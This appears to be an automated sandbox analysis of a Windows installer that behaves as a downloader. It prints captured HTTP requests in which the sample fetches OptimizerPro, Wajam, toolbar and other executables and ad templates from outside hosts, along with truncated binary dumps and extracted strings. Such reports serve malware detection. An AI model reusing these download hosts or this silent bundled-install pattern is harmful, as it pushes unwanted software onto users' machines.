21c6...............r.Ir..G.z....."HjOWc........\....D.h.=...n..........i.&.$....>...b...X.}....YYY......t4....]..~.?.>q...>........;>~....=.).O...........m.u...y....& ....7_.U...mQ.........f.v.............2..g..Y.....^...*[.x.9[..u.v..-...\U..}Sm.M.......EV...&}...k.}.&.n.u.........o......7... ......7.2{{^.V..frPZ..,..|S...\.W...V...*......D..KW {{......x.....(N7.w.m..|...b..`.t.U\.....*......~........uV..y-N...ok.|#.o.....~.Ijq.%"/...]..].3z.K...F...-.&....\K..Y.=..|...t.z.H...2]..S/..........]Zf....#..<.....%_.iV.Q...U..gS4.mF.on.*.g.*3...s{.....7.........=..?.. wS..../..K...*.E..q..|.}.....``.......m.Eq.Y...(...W...y.9.z<....y..z&Y..6n.y.E.^..t.....{s.)=...U~fe....|3_.....~.6.....aa..No...U......9.J....e... =vS..e>..6......faC..f~Gn...]z..........~..Kg...UqS.....g0..A/...?.g.n....P..(..c.Y.BZ...]..c..,....w.....m.....y...6.W..*.v ...... d.t9.K.....U.......R....`Q.<o.b._g`n.B.x0.lT..2.B/.{.r.ygL|..4S.....&a..L "....M.P..Q.\.Uv.............4...A1.#.?~0......vQ....H..[.....c.*...7....8..#....__..... .=^...2..........7:.3.._.....w..'.I.1pb..W2g..\...>.^..6H.\......w$.......jyaC.l'9.2.0J.P.'..j2...5.m...XT...x....9P.Y.T.@]."7....'.s...Yy...W.7K.l.L77.Z......*0h..Xi...y..b....9sO.]..X5.....X..&.G..s.i......K 3l&P.m.L....0....G.%/...2PI.G..S...f......5.0B..A..b.q..tO?d`._....K..k.............GS.{?N..)7..?.......l....A..$n2.]...wt...19........g...d..q2H>..S7....io08Q.*-tu..S.k..2..D>,.C......z.q.!.ee...),.ZVC...q. .?i..l..;....*B].....?.1...E7.....Y..a......".$....xi....e....... .1&l
<<< skipped >>>
GET /test.html HTTP/1.1
Host: track.v2.sslsecure4.com
Connection: Close
HTTP/1.1 200 OK
Content-Type: text/html
Date: Wed, 19 Nov 2014 18:12:23 GMT
Server: nginx
Content-Length: 8
Connection: Close
correct...
GET /111001464/OptimizerPro.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.softservers.net
Connection: Close
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Wed, 19 Nov 2014 18:08:49 GMT
Content-Type: application/octet-stream
Content-Length: 6160376
Last-Modified: Wed, 19 Nov 2014 16:07:25 GMT
Connection: close
ETag: "546cc03d-5dfff8"
Content-Disposition: attachment; filename=OptimizerPro.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A...A...A.....x.Q.....M.t.....L.?...H.u.H...A.........I.C.....|.@.....{.@...RichA...........................PE..L...KncT.................F....\.....ih.......`....@..........................@^.......^...@.....................................P.......,.[...........].......]......a..............................@...@............`..d............................text....D.......F.................. ..`.rdata...Q...`...R...J..............@..@.data....4..........................@....rsrc...,.[.......[.................@..@.reloc..4W....]..X....].............@..B.................................................................................................................................................................................................................................................................................................................................................. bA...E.......U..V.... bA...E...E..t.V.jC.......^]............U..V...dE...E..t.V.@C.......^]...................:E.............U..j.h.PA.d.....P...SV...A.3.P.E.d......u.3.S...m>...]..^..^..^..^..^..^..^..^ .E..;.u(.E.P.M..E...A..iD..hp.A..M.Q.E..bA...[..WV.e;........M.d......Y^[..].....U..j.hTPA.d.....PVW...A.3.P.E.d......u.V.E.......:...F.3....;.t.P.KH......~..F.;.t.P.8H......~..F.;.t.P.%H......~..F.;.t.P..H........~..E.......=...M.d......Y_^..].............U...E.VP... D.....bA...^].......U..QV..j..M..
<<< skipped >>>
GET /debug/Version/4_0_6_25/Nsis/CopyFiles HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:11:57 GMT
Server: Apache
Set-Cookie: vsid=922vr1639663172813827; expires=Mon, 18-Nov-2019 18:11:57 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<html>..<head><meta name="tids" content="a='471' b='1912' c='sslsecure1.com' d='manual_mapped'" /><title>sslsecure1.com</title>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">..<style type="text/css">../*RESET*/..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,caption,cite,code,dfn,th,var{font-style:normal;font-weight:normal;}ol,ul {list-style:none;}caption,th {text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;}q:before,q:after{content:'';}abbr,acronym {border:0;}../*COMMON*/...wrapper {text-align: center;}...img {margin:0px; margin-bottom:-11px !important;}...wrapper table { text-align: left; margin: 0 auto; font-family: arial, sans-serif; color: #515151; font-size: 12px;.}...h-list {background: url(hXXp://i2.cdn-image.com/__media__/pics/471/top-nav-bg.gif) repeat-x left top;}...h-list li {display: inline; text-align:left;}...h-list li strong {color: #358a35;}..h2 {color: #63ad63; font-size: 14px; font-weight: bold;}../*HEADER*/..#header {border-top: 4px solid #358a35; padding-top: 8px;}..#header .cufondiv h1 a {...color: #63ad63;...font-weight: bold;...font-size: 35px;...text-decoration: none;...font-family: "ChunkFive", arial, serif;...font-weight:bold;...}..#header .normalfondiv h1 a
<<< skipped >>>
GET //Styles/Templates/e9c1a9ca_Win_A_Banner_DeclineLink.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate,gzip, deflate
Host: staticrr.paleokits.net
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:44 GMT
Content-Type: application/zip
Content-Length: 344899
Last-Modified: Fri, 07 Mar 2014 11:17:00 GMT
Connection: close
ETag: "5319aaac-54343"
Accept-Ranges: bytes
PK.........YgD..l>9....c......style.css..ko......?....M-G.#q...m...p.-..^...D.... ..w....S")JvrIp-b#.I.3...p.....\....,Z.PZ.......Q..._D.,*.%h.K..a.*..r8......R.s]....<.*T............^.Sx?,QD....A..<._..$.>_..|;<..`........#..!(s...:.....< VC..|].A.6.,.... X,p:u..A.......!.......u...3.}.D...eIVL...9}...j9=;w..-..^,.i0.e.8..... j]..,......,.S.k:....Q...Q1O.....1Jy......y..t...I.rX@.g)*@....J~. F....-.U..,&.P......arr.>%.1..W..........l%..p.W..h.........LJ....<....m..U..........!H..vN`:s........D....{D4..e.i.........%..t...!~\......F..^..Sgt...."...x...<.-.`...t..w..@..8....X.. (."=U.....(....(.....JL-..@...=...W..1.p..2.j..y...rlK.l..{|D....s.%.2....3.\ 'H3.... ......'.....iu....D..D....D!..A.....Q....@..y(`>.3b0?;..1..CW... ..V.W.gd.......R1..2.P.|.......^..p.."...5..L."mF.......R..8...[.PB..#]}F8- .....%E.......F#.D.!....."..:.,.:R\Y...g>...R.u].....B...B....@C./.DP.Zc.....g.d#i.2.A......af.D.4;.@~WW.......&..Srfk.8--.....n..s..b....d).......e..W.d......?l=...5...GG...G......$&..=.......tV.W....p...1........p...xF. ..1..pL.sD....;......._,....3..,....a.....s<.L...<..`.....)9.4...x(...P2...w...e......a....wqIe...6.8.....5..mx.gD.1G.....`.IA...>.X.<.... .~..b..dq..8.^...uN>.d..!...8*.2.W.. .....H.U........7. ...w..D.O_r.W....9....0.F..._..L.........V.VI5Y.s..sZ ]` #%Z..p ..Z .;olx.........M.C..^.....7.......p.....O.6.m.....zd.<..G.,g...Y.j.|..TP...|...d2.r.....K.6......b....vu..|..s.. ... 7.....9'.c..[...sD0C........F..,I..R....IcL._...I ...(ZB....LZ.m.2.....;h
<<< skipped >>>
GET /21/all/hqv/ca/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newonlinedemoserv.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:41 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1416403573"
Last-Modified: Wed, 19 Nov 2014 13:26:13 GMT
Cache-Control: max-age=1065
Content-Length: 12531440
Content-Type: application/x-msdownload
X-HW: 1416420761.dop002.ny2.t,1416420761.cds045.ny2.c
Content-Disposition: attachment; filename="setup.exe"
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......P.....................n......-A............@.................................\:........ ..............................p......................X%...............................................................................................text...<........................... .0`.data...............................@.0..rdata..8$.......&..................@.0@.bss..................................0..idata.......p......................@.0..ndata...`....... ..................@.0..rsrc...............................@.0.................................................................................................................................................................................................................................................................................................................................................................................U..WVS.......U..E....t...F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E...$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT........FP..E........}..VP........U.......FT.............}..........E..M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q....~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX..$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>
GET /betatest/mystart/mystartTb_5.4.1.4_sambamedia.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: betatest.vmn.net
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:32 GMT
Server: Apache/1.3.41 (Unix)
Last-Modified: Wed, 04 Jun 2014 14:56:26 GMT
ETag: "8fbd-5362b8-538f339a"
Accept-Ranges: bytes
Content-Length: 5464760
Connection: close
Content-Type: application/octet-stream
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................@........S......................................s..........hI...........KS..............................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...hI.......J...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /download/wajam_download.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: VVV.wajam-download.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:41 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 21 May 2014 20:10:51 GMT
ETag: "7015d-f0c0-4f9ee97ca68c0"
Accept-Ranges: bytes
Content-Length: 61632
Connection: close
Content-Type: application/x-msdos-program
Set-Cookie: APPSESSID=w2|VGzdn|VGzdn; path=/
Cache-control: private
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@..................................`..............................................................P...p............................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata...0...p...........................rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET //Displays/Softwares/1f76ab55_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:47 GMT
Content-Type: text/html
Last-Modified: Thu, 17 Jul 2014 09:13:47 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
28a3...............r.......i..-E.Two;foI....$. ..@....;.@...P.W.......y.....7.'...2..p.Zrx..8l.(de.:........p...A.Mg..;..........k....~.Z_...G........iYeE.......OK?l...<..?.M.|.dyZ.d.......aoQT.......4_..C.s2?Xr.....~.;.......{.M..[f.Yz.wt..&.<u..-..?......j..aQ..f..O.j..............j....'.......lzQ...Z.......Z[....E...-f..A.:..&e.....e...........\eXV..[O...d6.........7.....Sw...M.t7e1wq.Y.L ...rU.....b.._6.]Ri...MZ..~!J....j..3i.........d.r..,_=d.......?....,.....O.[.g.....A......n....M..*.{.......J.X<.~q..].2E..4..c....>........5*...........*.).l6......../.d...j.....m2I.....p..-.i.e.%l.wEq;K.......}V.......kC0.^................>:.M....A[..N4V..K.6.J.rrw.n.'.....d:=(.}7 &P.(.O..n:....Dfi.....tf:...TT.t.4A....}O'.H.z...vq.....oL...m.).@7..?O.....D..Of.i...=B.4_j.4....%$.d.'.I.........FI=.bMK..o.l.....-.tv.E..V.7...DU..%.e.gl...R.vy.}......b.vW.e.....r..^.(/.y.....:...2....u.........r.........).!:..&...[b;.......%....>..M.^.H..__........[..m1$...Y.\.=.^,....V._.p[&sd=K.........C.P...<.f..%..).[....TzP.y6.J..E..x......W2....@...?..L....6c^0O...Y.d...oy.....u.<...#...Kin..G...xx1........#.#.....,....."|;i....@..oH..).....Z..U.m..<z.......Y..R.E....*z..[6s..g.....#.mB.eI>..\/...T'Co...m.%&.Fc.@D2.. ..:.e.q.0. ....BQc.......u.h.............R..R..62M......u..........~...b. .?..(<.\...g.(p.9N.;..Yq......bu ...f`$DV.d.-..Y.......*U1[.l..g.y1...W.|'.a..E...&A......A.t..?}....hy.Op..e.......v..b.(20..*.N'.............<.&...I*k...B...).....U.\.dBa..v../...B...q#....T.....Q.&. .@R..#....
<<< skipped >>>
GET //Styles/Softwares/67423fe2_wajam.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:46 GMT
Content-Type: application/zip
Content-Length: 111525
Last-Modified: Thu, 17 Jul 2014 09:09:05 GMT
Connection: close
ETag: "53c792b1-1b3a5"
Accept-Ranges: bytes
PK.........P.D.........0......wajam.css.Z[o.H.~&R..l.H..b.`...lD.UW.V.t.gb...3.p...._f..xn....Rjl.e.|.;.....^....... }~......{w.^..~.G..M.w...(1q..........E//.qp....?/.*;../..%..g...^....'...._./..o.a..}.v.>....v..O'..=D.4....o...EHO.....vy...s...G.ez.|.....<...K6A..Y|.5.o.. ?...C.1 t....|..<..l...k...$.liYr..[.5>...k...........z.........e[J....C....k...P.".....Aw?.H.U...A.q....M....Z...a\Ci.EE.P....a......TD.....^K..(.....#Jv........F.a*.;.mL...]1...@....j.\.........L.(.Z.A..2n.g2..y..._.A.......l.xa......|.............n..Uc1}.d^....,.$..i..7....J;...I..Oap.B.F.......>...IR..#..%.2* 1eV..nhr..t.eQ..5wNFr..M..i..i.{....".........o. .6,{..*..}.2..L/...q...o........h2.;.r..........&..{.......H..:....7uCg.o..&..X.......o.C.)7.`.).p....)..0...... v....T.UQi..../......2.-....M.....z....d.Es....J...u`,......k..,.Q.QT.a......%..R.q..d...d.....}.fqk3.Q6F..1O.....2..B..wd.......=Um/.03H1......t......w.T$.......P.M.....v*y/Q.R.9.t.X..OFt.F...$..Zn..-.........\....d....rOg;...f..3...r.tw.p.....r.........6...:..%#......m..../....f....n.......tci.t.?.X.........z...y......'...K.vA..n.Z.....f>C, .P...O..D...D........s. ..kf...8^(....8 .qc6....0..NJ....../....Y..BW{.....c...f7....n...?.......,v.A.&L...#j.&.`/.v*...|)Nr..E.>..6 ....&_..I....af...:...V.*...h.......~6....=.ya.f.9;...Y|...:..$(.....6Lm-.7R5.... 4;......<f%..A..`.J......9..............<."3?:D!^......Go...QJ...2mV...>[g.?...O...^... PP.....=w#...n...}..~....P.[jx... ]g.......s...........Ti......@.JP.../^..\.....y..OQ......d..>.I..'..
<<< skipped >>>
GET /111001464/OptimizerPro.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.softservers.net
Connection: Close
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Wed, 19 Nov 2014 18:08:49 GMT
Content-Type: application/octet-stream
Content-Length: 6160376
Last-Modified: Wed, 19 Nov 2014 16:07:25 GMT
Connection: close
ETag: "546cc03d-5dfff8"
Content-Disposition: attachment; filename=OptimizerPro.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A...A...A.....x.Q.....M.t.....L.?...H.u.H...A.........I.C.....|.@.....{.@...RichA...........................PE..L...KncT.................F....\.....ih.......`....@..........................@^.......^...@.....................................P.......,.[...........].......]......a..............................@...@............`..d............................text....D.......F.................. ..`.rdata...Q...`...R...J..............@..@.data....4..........................@....rsrc...,.[.......[.................@..@.reloc..4W....]..X....].............@..B.................................................................................................................................................................................................................................................................................................................................................. bA...E.......U..V.... bA...E...E..t.V.jC.......^]............U..V...dE...E..t.V.@C.......^]...................:E.............U..j.h.PA.d.....P...SV...A.3.P.E.d......u.3.S...m>...]..^..^..^..^..^..^..^..^ .E..;.u(.E.P.M..E...A..iD..hp.A..M.Q.E..bA...[..WV.e;........M.d......Y^[..].....U..j.hTPA.d.....PVW...A.3.P.E.d......u.V.E.......:...F.3....;.t.P.KH......~..F.;.t.P.8H......~..F.;.t.P.%H......~..F.;.t.P..H........~..E.......=...M.d......Y_^..].............U...E.VP... D.....bA...^].......U..QV..j..M..
<<< skipped >>>
GET /test.html HTTP/1.1
Host: api.v2.sslsecure2.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:24 GMT
Server: Apache
Set-Cookie: vsid=903vr1639663440521855; expires=Mon, 18-Nov-2019 18:12:24 GMT; path=/; domain=api.v2.sslsecure2.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET /7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: aff-software.s3-website-us-east-1.amazonaws.com
Connection: Close
HTTP/1.1 200 OK
x-amz-id-2: yoJdAcWghu8e0GmsJ9T8ZneomMMaQo6EcXXnzIssdoDa3ZhPU5nuJRh7BYGTDMzJirhPD2at7OE=
x-amz-request-id: EBA71CAF9DECDF78
Date: Wed, 19 Nov 2014 18:12:43 GMT
Last-Modified: Tue, 08 Jul 2014 14:34:06 GMT
ETag: "af37247590f4e4b8a8a214a091ea6067"
Content-Type: application/octet-stream
Content-Length: 73816
Server: AmazonS3
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.................................|........................................t..........0m..............p............................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc...0m.......n...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET //Docking/Docking.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:45 GMT
Content-Type: application/zip
Content-Length: 37048
Last-Modified: Tue, 26 Nov 2013 13:00:11 GMT
Connection: close
ETag: "52949b5b-90b8"
Accept-Ranges: bytes
PK........1Q.A..T.............position1A.css.....0.D..W\.n....H.Q... .~@l...Ii"*..k.......9..]..t.jp.../.......6.<7Th...5L....}..E.. ....L.S...........V*...8.;r...,6..r..'.?WC......yX.'c............&.XHA...PK........,g.B^P.]............position2A.css.S.N.0.}n..b.K...m$p^v.j%^...~..............!.RB....c.9s.L~f...[r.....y.x..\.V.7d.-..L..}o.3k.........Dp.....99....x...P)3....(..V........EL..I..B.G.A..{.y........en....<.&.l...[..~.U..'..7..sCC.....O.Z....H.J..G.p;...`.>.....-V ..g6R.......qQ%.Ua....E.7>..o...W.....f..k.L.ME.....cTSF.....s|....#..%....| ..hBv...Lqf(..@.w=...~P$<p.E...y.u..........W.k0[...w.Z......fye.../...&Q.....c.q........1.0.g..ay......|.gI....W.4...GJ...R..e...;.....}b.5.3.^\...A[..O.FX..'5o.%r......F..:....PK.........H.@....Z...........position2B.css.Q.N.0.....D..a..Fp.1B............]....mA......$=.|?=.uF.U.....[ot..~...9Ld.Y.......N.y`~................#.||..j)y.(/..n.....^....45.....\.."..k$. ...0..@C'.$....Q..V.:k&.Z%.U ?.X.-..F..E.Ra.<u..;($g...}.......Ah...)...L.*5.Q0(.M.v.....t`....ho..........d/4.p...A.7.....Ee.$*J...S..r.=.<.... l..%.|!j..6..c"...%:.d.......Hen.[xK...O./....U.}fuV..PK.........lMBjre.....B.......position2C.css.....0....S...bL/....A...P}....h3%....nE.*..Y...}.]..FZ.m7s:.%..0MS...PIm.g....7...U..,VK..}....c..c..-b.g.FS...(.P.x.0.\.?\.'TS...k.2!WG4.....#G%l.. .'.{.....ix...B.}a..m..R.v......(.........,..#E.3'8.._....?...z.PK........VG.@! h.............position3A.css..Qo.0....S.:...-..R.........}..N.f|..k...}6Ic.%.:x;.......TT.l....._..Y._]..r._.x..Ppq.C
<<< skipped >>>
Map
The Application connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_668:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe" /path="c:\%original file name%.exe" ""
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe" /path="c:\%original file name%.exe" ""
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7E.tmp\nsisdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7E.tmp\nsisdl.dll
b151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe->C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\parent.txt
b151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe->C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\parent.txt
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7E.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7E.tmp
989d5cc8701b151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\parent.txt
989d5cc8701b151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\parent.txt
b151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe
b151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe
D.MH;
D.MH;
v2.0.50727
v2.0.50727
setup.exe
setup.exe
CallUrl
CallUrl
.ctor
.ctor
System.Resources
System.Resources
System.Reflection
System.Reflection
System.Runtime.InteropServices
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Runtime.CompilerServices
System.IO
System.IO
System.Net
System.Net
WebRequest
WebRequest
HttpWebRequest
HttpWebRequest
IWebProxy
IWebProxy
get_DefaultWebProxy
get_DefaultWebProxy
WebResponse
WebResponse
HttpWebResponse
HttpWebResponse
Password
Password
{653B694D-F0F9-46DC-9D9E-8009DAEE1127}
{653B694D-F0F9-46DC-9D9E-8009DAEE1127}
System.Security.Cryptography
System.Security.Cryptography
PasswordDeriveBytes
PasswordDeriveBytes
set_Key
set_Key
4.0.6.25
4.0.6.25
$a789a08e-b7be-465a-9659-4044b21e32a9
$a789a08e-b7be-465a-9659-4044b21e32a9
_CorExeMain
_CorExeMain
mscoree.dll
mscoree.dll
Ñ[g
Ñ[g
]]%uB
]]%uB
%original file name%.exe
%original file name%.exe
8517AB~1.EXE
8517AB~1.EXE
151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\parent.txt
151783808a.exe\accf2b3b9b5348daa94a4a85442bd38d\parent.txt
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7E.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7E.tmp
c:\%original file name%.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa7D.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa7D.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v3.0a1
Nullsoft Install System v3.0a1
09ac72b88ef140aa8ee609de7640785e.txt
09ac72b88ef140aa8ee609de7640785e.txt
%original file name%.exe_676_rwx_675A6000_00003000:
.Qg
.Qg
*Rg`.Rg|)RgL Rg
*Rg`.Rg|)RgL Rg